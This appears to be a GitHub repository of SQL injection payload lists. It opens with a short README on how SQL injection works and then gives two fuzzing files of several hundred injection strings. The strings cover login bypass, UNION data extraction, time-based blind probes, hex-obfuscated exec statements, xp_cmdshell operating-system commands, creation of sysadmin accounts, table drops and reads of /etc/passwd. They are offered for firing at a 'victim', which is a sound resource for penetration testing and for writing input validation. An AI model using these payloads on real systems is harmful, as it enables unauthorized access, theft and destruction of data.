SQL Injection Vulnerability Payload List
17 | Overview:
18 |
19 | A SQL injection attack consists of the insertion or "injection" of a SQL query
20 | via the input data sent from the client to the application. A successful SQL injection exploit
21 | can read sensitive data from the database, modify database data (Insert/Update/Delete),
22 | execute administration operations on the database (such as shutting down the DBMS), recover the content of a
23 | given file present on the DBMS file system and, in some cases, issue commands to the operating system.
24 | SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order
25 | to affect the execution of predefined SQL commands. The root cause is application code that builds SQL text from client input instead of binding that input as a parameter, which is why parameterized queries are the primary defense.
26 |
27 |
References
28 |
29 |
30 | • SQL Injection: https://www.owasp.org/index.php/SQL_Injection
31 |
32 |
33 | Download
34 |
35 | Cloning an Existing Repository ( Clone with HTTPS )
36 |
37 | root@slife:~# git clone https://github.com/omurugur/SQL_Injection_Payload.git
38 |
39 | Cloning an Existing Repository ( Clone with SSH )
40 |
41 | root@slife:~# git clone git@github.com:omurugur/SQL_Injection_Payload.git
42 |
43 |
44 |
45 | Contact
46 |
47 | Mail : omurugur12@gmail.com
48 |
49 | Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
50 |
51 | GitHub : https://github.com/omurugur
52 |
53 | Twitter : https://twitter.com/omurugurrr
54 |
55 | Medium : https://omurugur.medium.com/
56 |
--------------------------------------------------------------------------------
/SQL-Auth-Bypass.txt:
--------------------------------------------------------------------------------
1 | '-'
2 | ' '
3 | '&'
4 | '^'
5 | '*'
6 | ' or ''-'
7 | ' or '' '
8 | ' or ''&'
9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 | ==
79 | =
80 | '
81 | ' --
82 | ' #
83 | ' –
84 | '--
85 | '/*
86 | '#
87 | " --
88 | " #
89 | "/*
90 | ' and 1='1
91 | ' and a='a
92 | or 1=1
93 | or true
94 | ' or ''='
95 | " or ""="
96 | 1′) and '1′='1–
97 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
98 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
99 | and 1=1
100 | and 1=1–
101 | ' and 'one'='one
102 | ' and 'one'='one–
103 | ' group by password having 1=1--
104 | ' group by userid having 1=1--
105 | ' group by username having 1=1--
106 | like '%'
107 | or 0=0 --
108 | or 0=0 #
109 | or 0=0 –
110 | ' or 0=0 #
111 | ' or 0=0 --
112 | ' or 0=0 #
113 | ' or 0=0 –
114 | " or 0=0 --
115 | " or 0=0 #
116 | " or 0=0 –
117 | %' or '0'='0
118 | or 1=1
119 | or 1=1--
120 | or 1=1/*
121 | or 1=1#
122 | or 1=1–
123 | ' or 1=1--
124 | ' or '1'='1
125 | ' or '1'='1'--
126 | ' or '1'='1'/*
127 | ' or '1'='1'#
128 | ' or '1′='1
129 | ' or 1=1
130 | ' or 1=1 --
131 | ' or 1=1 –
132 | ' or 1=1--
133 | ' or 1=1;#
134 | ' or 1=1/*
135 | ' or 1=1#
136 | ' or 1=1–
137 | ') or '1'='1
138 | ') or '1'='1--
139 | ') or '1'='1'--
140 | ') or '1'='1'/*
141 | ') or '1'='1'#
142 | ') or ('1'='1
143 | ') or ('1'='1--
144 | ') or ('1'='1'--
145 | ') or ('1'='1'/*
146 | ') or ('1'='1'#
147 | 'or'1=1
148 | 'or'1=1′
149 | " or "1"="1
150 | " or "1"="1"--
151 | " or "1"="1"/*
152 | " or "1"="1"#
153 | " or 1=1
154 | " or 1=1 --
155 | " or 1=1 –
156 | " or 1=1--
157 | " or 1=1/*
158 | " or 1=1#
159 | " or 1=1–
160 | ") or "1"="1
161 | ") or "1"="1"--
162 | ") or "1"="1"/*
163 | ") or "1"="1"#
164 | ") or ("1"="1
165 | ") or ("1"="1"--
166 | ") or ("1"="1"/*
167 | ") or ("1"="1"#
168 | ) or '1′='1–
169 | ) or ('1′='1–
170 | ' or 1=1 LIMIT 1;#
171 | 'or 1=1 or ''='
172 | "or 1=1 or ""="
173 | ' or 'a'='a
174 | ' or a=a--
175 | ' or a=a–
176 | ') or ('a'='a
177 | " or "a"="a
178 | ") or ("a"="a
179 | ') or ('a'='a and hi") or ("a"="a
180 | ' or 'one'='one
181 | ' or 'one'='one–
182 | ' or uid like '%
183 | ' or uname like '%
184 | ' or userid like '%
185 | ' or user like '%
186 | ' or username like '%
187 | ' or 'x'='x
188 | ') or ('x'='x
189 | " or "x"="x
190 | ' OR 'x'='x'#;
191 | '=' 'or' and '=' 'or'
192 | ' UNION ALL SELECT 1, @@version;#
193 | ' UNION ALL SELECT system_user(),user();#
194 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
195 | admin' and substring(password/text(),1,1)='7
196 | ' and substring(password/text(),1,1)='7
197 |
--------------------------------------------------------------------------------
/SQL-Inj-Payload.txt:
--------------------------------------------------------------------------------
1 | # ms-sqli info disclosure payload fuzzfile
2 | # replace regex with your fuzzer for best results
3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim
4 | # might need to terminate payloads with ;--
5 | select @@version
6 | select @@servernamee
7 | select @@microsoftversione
8 | select * from master..sysserverse
9 | select * from sysusers
10 | exec master..xp_cmdshell 'ipconfig+/all'
11 | exec master..xp_cmdshell 'net+view'
12 | exec master..xp_cmdshell 'net+users'
13 | exec master..xp_cmdshell 'ping+'
14 | BACKUP database master to disks='\\\\backupdb.dat'
15 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
16 | # you will need to customize/modify some of the values in the queries for best effect
17 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
18 | 'create user name identified by 'pass123' --
19 | 'create user name identified by pass123 temporary tablespace temp default tablespace users;
20 | ' ; drop table temp --
21 | 'exec sp_addlogin 'name' , 'password' --
22 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
23 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
24 | ' grant connect to name; grant resource to name; --
25 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
26 | ' or 1=1 --
27 | ' union (select @@version) --
28 | ' union (select NULL, (select @@version)) --
29 | ' union (select NULL, NULL, (select @@version)) --
30 | ' union (select NULL, NULL, NULL, (select @@version)) --
31 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
32 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
33 | 1'1
34 | 1 exec sp_ (or exec xp_)
35 | 1 and 1=1
36 | 1' and 1=(select count(*) from tablenames); --
37 | 1 or 1=1
38 | 1' or '1'='1
39 |
40 | )%20or%20('x'='x
41 | %20or%201=1
42 | ; execute immediate 'sel' || 'ect us' || 'er'
43 | benchmark(10000000,MD5(1))#
44 | update
45 | ";waitfor delay '0:0:__TIME__'--
46 | 1) or pg_sleep(__TIME__)--
47 | ||(elt(-3+5,bin(15),ord(10),hex(char(45))))
48 | "hi"") or (""a""=""a"
49 | delete
50 | like
51 | " or sleep(__TIME__)#
52 | pg_sleep(__TIME__)--
53 | *(|(objectclass=*))
54 | declare @q nvarchar (200) 0x730065006c00650063 ...
55 | or 0=0 #
56 | insert
57 | 1) or sleep(__TIME__)#
58 | ) or ('a'='a
59 | ; exec xp_regread
60 | *|
61 | @var select @var as var into temp end --
62 | 1)) or benchmark(10000000,MD5(1))#
63 | asc
64 | (||6)
65 | "a"" or 3=3--"
66 | " or benchmark(10000000,MD5(1))#
67 | # from wapiti
68 | or 0=0 --
69 | 1 waitfor delay '0:0:10'--
70 | or 'a'='a
71 | hi or 1=1 --"
72 | or a = a
73 | UNION ALL SELECT
74 | ) or sleep(__TIME__)='
75 | )) or benchmark(10000000,MD5(1))#
76 | hi' or 'a'='a
77 | 0
78 | 21 %
79 | limit
80 | or 1=1
81 | or 2 > 1
82 | ")) or benchmark(10000000,MD5(1))#
83 | PRINT
84 | hi') or ('a'='a
85 | or 3=3
86 | ));waitfor delay '0:0:__TIME__'--
87 | a' waitfor delay '0:0:10'--
88 | 1;(load_file(char(47,101,116,99,47,112,97,115, ...
89 | or%201=1
90 | 1 or sleep(__TIME__)#
91 | or 1=1
92 | and 1 in (select var from temp)--
93 | or '7659'='7659
94 | or 'text' = n'text'
95 | --
96 | or 1=1 or ''='
97 | declare @s varchar (200) select @s = 0x73656c6 ...
98 | exec xp
99 | ; exec master..xp_cmdshell 'ping 172.10.1.255'--
100 | 3.10E+17
101 | " or pg_sleep(__TIME__)--
102 | x' AND email IS NULL; --
103 | &
104 | admin' or '
105 | or 'unusual' = 'unusual'
106 | //
107 | truncate
108 | 1) or benchmark(10000000,MD5(1))#
109 | \x27UNION SELECT
110 | declare @s varchar(200) select @s = 0x77616974 ...
111 | tz_offset
112 | sqlvuln
113 | "));waitfor delay '0:0:__TIME__'--
114 | ||6
115 | or%201=1 --
116 | %2A%28%7C%28objectclass%3D%2A%29%29
117 | or a=a
118 | ) union select * from information_schema.tables;
119 | PRINT @@variable
120 | or isNULL(1/0) /*
121 | 26 %
122 | " or "a"="a
123 | (sqlvuln)
124 | x' AND members.email IS NULL; --
125 | or 1=1--
126 | and 1=( if((load_file(char(110,46,101,120,11 ...
127 | 0x770061006900740066006F0072002000640065006C00 ...
128 | %20'sleep%2050'
129 | as
130 | 1)) or pg_sleep(__TIME__)--
131 | /**/or/**/1/**/=/**/1
132 | union all select @@version--
133 | ,@variable
134 | (sqlattempt2)
135 | or (EXISTS)
136 | t'exec master..xp_cmdshell 'nslookup www.googl ...
137 | %20$(sleep%2050)
138 | 1 or benchmark(10000000,MD5(1))#
139 | %20or%20''='
140 | ||UTL_HTTP.REQUEST
141 | or pg_sleep(__TIME__)--
142 | hi' or 'x'='x';
143 | ") or sleep(__TIME__)="
144 | or 'whatever' in ('whatever')
145 | ; begin declare @var varchar(8000) set @var=' ...
146 | union select 1,load_file('/etc/passwd'),1,1,1;
147 | 0x77616974666F722064656C61792027303A303A313027 ...
148 | exec(@s)
149 | ) or pg_sleep(__TIME__)--
150 | union select
151 | or sleep(__TIME__)#
152 | select * from information_schema.tables--
153 | a' or 1=1--
154 | a' or 'a' = 'a
155 | declare @s varchar(22) select @s =
156 | or 2 between 1 and 3
157 | or a=a--
158 | or '1'='1
159 | |
160 | or sleep(__TIME__)='
161 | or 1 --'
162 | or 0=0 #"
163 | having
164 | a'
165 | " or isNULL(1/0) /*
166 | declare @s varchar (8000) select @s = 0x73656c ...
167 | â or 1=1 --
168 | char%4039%41%2b%40SELECT
169 | order by
170 | bfilename
171 | having 1=1--
172 | ) or benchmark(10000000,MD5(1))#
173 | or username like char(37);
174 | ;waitfor delay '0:0:__TIME__'--
175 | " or 1=1--
176 | x' AND userid IS NULL; --
177 | */*
178 | or 'text' > 't'
179 | (select top 1
180 | or benchmark(10000000,MD5(1))#
181 | ");waitfor delay '0:0:__TIME__'--
182 | a' or 3=3--
183 | -- &password=
184 | group by userid having 1=1--
185 | or ''='
186 | ; exec master..xp_cmdshell
187 | %20or%20x=x
188 | select
189 | ")) or sleep(__TIME__)="
190 | 0x730065006c0065006300740020004000400076006500 ...
191 | hi' or 1=1 --
192 | ") or pg_sleep(__TIME__)--
193 | %20or%20'x'='x
194 | or 'something' = 'some'+'thing'
195 | exec sp
196 | 29 %
197 | (
198 | ý or 1=1 --
199 | 1 or pg_sleep(__TIME__)--
200 | 0 or 1=1
201 | ) or (a=a
202 | uni/**/on sel/**/ect
203 | replace
204 | %27%20or%201=1
205 | )) or pg_sleep(__TIME__)--
206 | %7C
207 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
208 | '%20OR
209 | ; or '1'='1'
210 | declare @q nvarchar (200) select @q = 0x770061 ...
211 | 1 or 1=1
212 | ; exec ('sel' + 'ect us' + 'er')
213 | 23 OR 1=1
214 | /
215 | anything' OR 'x'='x
216 | declare @q nvarchar (4000) select @q =
217 | or 0=0 --
218 | desc
219 | ||'6
220 | )
221 | 1)) or sleep(__TIME__)#
222 | or 0=0 #
223 | select name from syscolumns where id = (sele ...
224 | hi or a=a
225 | *(|(mail=*))
226 | password:*/=1--
227 | distinct
228 | );waitfor delay '0:0:__TIME__'--
229 | to_timestamp_tz
230 | ") or benchmark(10000000,MD5(1))#
231 | UNION SELECT
232 | %2A%28%7C%28mail%3D%2A%29%29
233 | +sqlvuln
234 | or 1=1 /*
235 | )) or sleep(__TIME__)='
236 | or 1=1 or ""=
237 | or 1 in (select @@version)--
238 | sqlvuln;
239 | union select * from users where login = char ...
240 | x' or 1=1 or 'x'='y
241 | 28 %
242 | â or 3=3 --
243 | @variable
244 | or '1'='1'--
245 | "a"" or 1=1--"
246 | //*
247 | %2A%7C
248 | " or 0=0 --
249 | ")) or pg_sleep(__TIME__)--
250 | ?
251 | or 1/*
252 | !
253 | '
254 | or a = a
255 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
256 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
257 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
258 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
259 | ' or 1=1
260 | or 1=1 --
261 | x' OR full_name LIKE '%Bob%
262 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
263 | '%20or%20''='
264 | '%20or%20'x'='x
265 | ')%20or%20('x'='x
266 | ' or 0=0 --
267 | ' or 0=0 #
268 | or 0=0 #"
269 | ' or 1=1--
270 | ' or '1'='1'--
271 | ' or 1 --'
272 | or 1=1--
273 | ' or 1=1 or ''='
274 | or 1=1 or ""=
275 | ' or a=a--
276 | or a=a
277 | ') or ('a'='a
278 | 'hi' or 'x'='x';
279 | or
280 | procedure
281 | handler
282 | ' or username like '%
283 | ' or uname like '%
284 | ' or userid like '%
285 | ' or uid like '%
286 | ' or user like '%
287 | '; exec master..xp_cmdshell
288 | '; exec xp_regread
289 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
290 | --sp_password
291 | ' UNION SELECT
292 | ' UNION ALL SELECT
293 | ' or (EXISTS)
294 | ' (select top 1
295 | '||UTL_HTTP.REQUEST
296 | 1;SELECT%20*
297 | <>"'%;)(&+
298 | '%20or%201=1
299 | 'sqlattempt1
300 | %28
301 | %29
302 | %26
303 | %21
304 | ' or ''='
305 | ' or 3=3
306 | or 3=3 --
307 |
--------------------------------------------------------------------------------